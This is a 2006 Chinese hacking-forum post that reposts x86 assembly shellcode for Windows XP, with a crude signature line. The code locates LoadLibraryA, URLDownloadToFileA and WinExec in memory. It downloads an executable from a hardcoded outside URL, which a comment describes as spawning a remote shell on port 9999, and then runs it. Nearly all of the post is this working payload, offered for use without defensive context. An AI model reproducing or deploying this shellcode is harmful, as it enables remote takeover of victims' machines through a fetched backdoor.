‹‹ 上一主题 | 下一主题 ››
发新话题
打印

download and execute shellcode for Windows XP

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9802 
精华
768 
积分
40165 
阅读权限
200 
性别
男 
在线时间
3967 小时 
注册时间
2004-7-4 
最后登录
2008-7-6 
楼主 发表于 2006-3-19 06:02  只看该作者

download and execute shellcode for Windows XP

文章作者:Peter4020@hotmail.com
复制内容到剪贴板
代码:
; Nice theorhetically generic url download and execute
; shellcode for Windows XP.
;
; Heck, atleast it saves you using tftp!
;
; [email]Peter4020@hotmail.com[/email]
;
; nasmw -s -fbin -o download.s download.asm
  
bits 32
  
start:
jmp short avoidnastynulls
  
continue:
pop edi ;          ; edi = 'urlmon.dll'
mov esi, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h] ;     ; edi = string of url
mov ebx, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h] ;     ; edi = path of download
mov edx, edi
repne scasb
inc byte [edi-01h]
push edx
  
push ebx
push edx
push esi
  
mov ebx, 0c25b5effh
mov ecx, 0deadc0deh
mov edi, 77e60101h
  
trawlmem:
inc edi
mov al, 0ffh
repne scasb
jmp short checkbytes
nop
  
checkbytes:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha
jmp short trawlmem
  
jmp short pastpoint
  
avoidnastynulls:
jmp short data
  
pastpoint:
  
gotcha:
lea eax, [edi-2eh] ;     ; get to start of loadlibrarya function
call eax ;        ; call loadlibrarya
  
pop edx
pop ebx
  
push edx
xor ecx, ecx
push ecx
push ecx
push edx ;        ; path of download
push ebx ;        ; url of download
push ecx
  
mov ebx, 8d8d5602h
mov ecx, 0badc0dedh
mov edi, eax ;        ; eax = base of urlmon.dll
  
trawlmem2:
inc edi
mov al, 002h
repne scasb
jmp short checkbytes2
nop
  
checkbytes2:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha2
jmp short trawlmem2
  
gotcha2:
lea eax, [edi-1bh] ;     ; get to start of urldownloadtofilea function
call eax ;        ; call urldownloadtofilea
  
pop edx
xor ecx, ecx
;inc ecx
push ecx
push edx
  
mov ebx, 0c458b66h
mov ecx, 1337f00dh
mov edi, 77e60101h
  
trawlmem3:
inc edi
mov al, 066h
repne scasb
jmp short checkbytes3
nop
  
checkbytes3:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha3
jmp short trawlmem3
  
gotcha3:
lea eax, [edi-16h] ;     ; get to start of winexec function
call eax ;        ; call winexec
  
mov ecx, 0deadc0deh
infloop: ;        ; infinite loop; no crash when done
inc ecx
cmp ecx, 0badc0dedh
loopnz infloop ;        ; if this slows you down too much, remove it!
  
int 3h
  
data:
call continue
db 'URLMON.DLL', 0ffh
db '[url]http://www.elitehaven.net/ncat.exe[/url]', 0ffh ;  ; the file at this address spawns remote shell on port 9999
db 'c:\nc.exe', 0ffh
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题